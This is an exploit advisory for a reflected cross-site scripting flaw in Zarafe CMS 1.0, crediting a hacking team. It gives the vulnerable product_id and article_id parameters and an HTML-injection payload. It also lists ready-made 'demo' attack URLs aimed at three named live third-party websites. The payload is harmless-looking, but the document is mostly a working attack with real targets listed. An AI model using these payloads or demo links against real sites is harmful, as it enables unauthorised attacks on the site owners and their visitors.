Zarafe CMS version 1.0 suffers from a cross site scripting vulnerability.
2c212b74dba952a9eba9c5eb7fef6a80390e117af9f21b2c278a69698498548a
######################
# Exploit Title : Zarafe CMS 1.0 / Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.zarrafeh.net/
# Category: [ Webapps ]
# Tested on: [ Win ]
# Version: 1.0
# Date: 2016/08/27
######################
#
# PoC:
GET => /product_view.php?product_id=[XSS]
GET => /articles.php?article_id=[XSS]
#Payload : 7b084"><marquee><font color=red size=4>Only For Security Alert c_C </font></marquee>
#Demo :
http://hadiesazan.ir/product_view.php?product_id=7b084%22%3E%3Cmarquee%3E%3Cfont%20color=red%20size=4%3EOnly%20For%20Security%20Alert%20c_C%20%3C/font%3E%3C/marquee%3E
http://www.pezeshkian-pharmacy.ir/products_view.php?product_id=7b084%22%3E%3Cmarquee%3E%3Cfont%20color=red%20size=4%3EOnly%20For%20Security%20Alert%20c_C%20%3C/font%3E%3C/marquee%3E
http://www.majidlab.com/articles.php?article_id=7b084%27%3E%3Cmarquee%3E%3Cfont%20color=red%20size=4%3EOnly%20For%20Security%20Alert%20c_C%20%3C/font%3E%3C/marquee%3E
######################
# Discovered by : Mojtaba MobhaM Mail:kazemimojtaba@live.com
# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R $ Mr_Mask_Black And All Persian Hack Team Members
# Homepage : persian-team.ir
######################